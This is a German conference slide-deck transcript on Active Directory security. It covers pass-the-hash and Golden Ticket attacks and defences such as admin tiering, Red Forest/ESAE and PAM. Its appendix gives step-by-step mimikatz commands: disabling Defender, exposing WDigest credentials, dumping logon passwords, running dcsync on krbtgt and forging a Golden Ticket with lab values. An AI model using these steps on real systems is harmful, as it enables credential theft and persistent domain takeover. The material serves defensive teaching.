Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket:...
Transcript of Folie 1 Robin Beismann Nils Kaczenski In roten und … · Demo: Typische Domäne, Golden Ticket:...
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 1
In roten und goldenen Wäldern
Active Directory Security heute
Robin Beismann
Nils Kaczenski
Einleitung: Nils (5 Min.)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 2
Ellen Bogen hat Besuch
Ellen Bogen
DC, DNS,
DHCP
DC, DNS,
WINS
Exchange SQL Server SQL Server
Datei ERP Proxy
Terminal Terminal Backup Management Intranet Support
FirewallDatei, DruckDatei, Druck
?
Johannes Beere
Unsere
Domäne ist
gehackt.
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 3
Robin BeismannNils Kaczenski
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 4
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 5
Los geht‘s!
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 6
Wie übernimmt man eine Domäne?
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 7
Wie übernimmt man eine Domäne? Nils (5 Min.) • Grundproblem: Standardaufbau und typische Betriebsweisen machen Angriffe zu leicht • Einbruch über Sicherheitslücken oder Social Engineering • Privilege Escalation und Lateral Movement • Golden Ticket ermöglicht dauerhaften Zugriff mit beliebigen Privilegien
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 8
… anfassen
Golden Ticket in einer typischen Domäne
Demo: Typische Domäne, Golden Ticket: Robin (10 Min.) • Domäne typisch.zz • Aufbau zeigen
• Standardgruppen • Helpdesk = Domänen-Admins
• Mimikatz - Golden Ticket (am Client) • User ist lokaler Admin • Greift Credentials von Helpdesk-Account ab • Erzeugt mit Dom-Admin-Rechten ein Golden Ticket • Beliebige Zugriffe möglich für 10 Jahre
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 9
Pass the Hash und Golden Ticket: Nils (5 Min.) Kerberos-Ablauf
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 10
Pass the Hash und Golden Ticket: Nils (5 Min.) • Mit Pass the Hash übernimmt man ein Konto, auch ohne das Kennwort im Klartext zu kennen • Grundansatz: Credentials von hochprivilegierten Konten abgreifen
• … dadurch reicht ein einziger "echter" Angriff, der Rest geschieht innerhalb des Netz-werks
• Prinzip Pass-the-Hash
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 11
Pass the Hash und Golden Ticket: Nils (5 Min.) • Das Golden Ticket verlängert einen einmaligen Angriff beliebig in die Zukunft • Dauerhafter Datenabfluss bzw. dauerhafte beliebige Manipulationen • Prinzip Golden Ticket
• GT erfordert Kommunikation mit dem DC, aber keine Anmeldung
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 12
Wie schützt man sich davor?
Admin Tiering und Red Forest: Nils (5 Min.)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 13
Admin Tiering und Red Forest: Nils (5 Min.) • Admin Tiering teilt das Netzwerk in Sicherheitszonen auf • Jeder Admin-Account ist nur für die jeweilige Ebene gut
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 14
Admin Tiering und Red Forest: Nils (5 Min.) • Der Red Forest separiert die Tier-0-Adminkonten noch weiter • Angriff auf den Golden Forest ermöglicht keine vollständige Übernahme, weil die Tier-0-Kon-
ten nicht im Golden Forest liegen
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 15
… anfassen
Red Forest (herkömmlich)
Demo: Red Forest: Robin (7 Min.) • Domänen golden.zz und red.zz • Domänenaufbau golden.zz zeigen
• Standardgruppen = leer • AD-Delegation gezielt eingerichtet • Anmeldebeschränkungen per GPO • Trust zum Red Forest
• Domänenaufbau red.zz zeigen • Schattengruppen zur Administration des Golden Forest • Schatten-Accounts • Anmeldebeschränkungen per GPO
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 16
Hardening: Nils (3 Min.) • Zusätzliches Hardening ist nötig, damit das Konzept aufgeht • Vor allem: Sorgfalt im Operating
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 17
Was geht mit Windows Server 2016?
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 18
PAM in Windows Server 2016: Nils (3 Min.) • PAM erweitert das Red-Forest-Prinzip • Administrative Zugriffe nur zeitgesteuert und auf Antrag
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 19
… anfassen
Red Forest mit Windows Server 2016
Demo: PAM: Robin (7 Min.) • Domänen pamgold.zz und pamred.zz • Aufbau mit MIM zeigen • Administrationsbeispiel zeigen
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 20
Ellen Bogen schützt sich vor Besuch
Ellen Bogen
• Was ist ESAE?
• Wovor schützt ESAE?
• Wer braucht ESAE?
• Wie hoch ist der Aufwand?
?!
Zusammenfassung: Nils (5 Min.) • Grundprinzipien ESAE
• Trennung privilegierter bzw. kritischer Zugriffe von der Produktionsumgebung • Hohe operative Sorgfalt - keine Ausnahmen, Bequemlichkeit muss hintenanstehen • Logging und Monitoring
• Wovor schützt ESAE? • Vor erweiterten Angriffsszenarien, die typische Schlampigkeit und Designfehler aus-
nutzen … • … die aber durch vorhandene Tools und Anleitungen längst nicht nur für High-End-
Hacker möglich sind • Wer braucht ESAE?
• Minimal: Alle Umgebungen mit erhöhtem Sicherheitsbedarf • Sinnvoll: Alle Unternehmen, die in ihrem Netzwerk etwas zu schützen haben
• Wie hoch ist der Aufwand? • Hoch bis sehr hoch • Ein sauber geplantes Design ist nötig, gefolgt von einem Redesign bestehender Umge-
bungen
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 21
Danke an unsere Partner!
Platinum Sponsor
Gold Sponsoren
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 22
Danke an unsere Partner!
Gold Sponsoren
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Folie 23
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
Anhang: Mit Mimikatz die Domäne übernehmen (Demo)
• Windows Defender abschalten (Registry) o HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender o Dword DisableAntiSpyware mit Wert 1
• Credentials eines Dom-Admins von einem PC stehlen - einfache Version, um es schnell zu zeigen o Auf dem Client, angemeldet als lokaler Admin o Registry Key setzen (ab Windows 8.1 erforderlich):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD), Wert 1 • Durch diesen Key verhält sich Windows 10 wie Windows 7 oder Windows 8, wo dieser
Schritt nicht nötig ist o Neu starten o Dom-Admin anmelden, angemeldet bleiben o Fast User Switching zu einem User mit lokalen Adminrechten o CMD als Admin
• mimikatz • privilege::debug • sekurlsa::logonpasswords
o Die Hashes und das Klartextkennwort des Dom-Admins werden angezeigt • Golden Ticket erzeugen - direkter Weg (Ticket sofort nutzen)
o CMD als Dom-Admin • mimikatz • privilege::debug • lsadump::dcsync /user:krbtgt • kerberos::golden /admin:JulesWinfield /domain:lab2019.faq-
o-matic.net /id:9999 /sid:S-1-5-21-2453261737-931746725-2009616223 /krbtgt:eb75bb744c1b820e2b6d7cffcea4152c /ptt
• exit • Ticket zeigen: klist o Funktion nachweisen:
• net use x: %logonserver%\c$ • x: • Wechseln auf den DC, dort compmgmt.msc und unter "Freigegebene Ordner" die Sit-
zungen anzeigen: Sitzung für Jules Winfield wird angezeigt, obwohl es den User gar nicht gibt
• Golden Ticket speichern und später verwenden o Schritt 1: Golden Ticket erzeugen und speichern
• CMD als Dom-Admin • mimikatz • privilege::debug • lsadump::dcsync /user:krbtgt • kerberos::golden /admin:JulesWinfield /domain:lab2019.faq-
o-matic.net /id:9999 /sid:S-1-5-21-2453261737-931746725-2009616223 /krbtgt:eb75bb744c1b820e2b6d7cffcea4152c /ticket:C:\Daten\Golden-Ticket.ticket
• exit o Schritt 2: Gespeichertes Ticket verwenden
• CMD als beliebiger (!) User • net use x: %logonserver%\c$ • Schlägt fehl - Credentials eine Dom-Admins fehlen • mimikatz • kerberos::ptt C:\Daten\Golden-Ticket.ticket • exit • klist
(zeigt Ticket für Jules Winfield)
www.michael-wessel.de
© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann
• net use x: %logonserver%\c$ • x: • Wechseln auf den DC, dort compmgmt.msc und unter "Freigegebene Ordner" die Sit-
zungen anzeigen: Sitzung für Jules Winfield wird angezeigt, obwohl es den User gar nicht gibt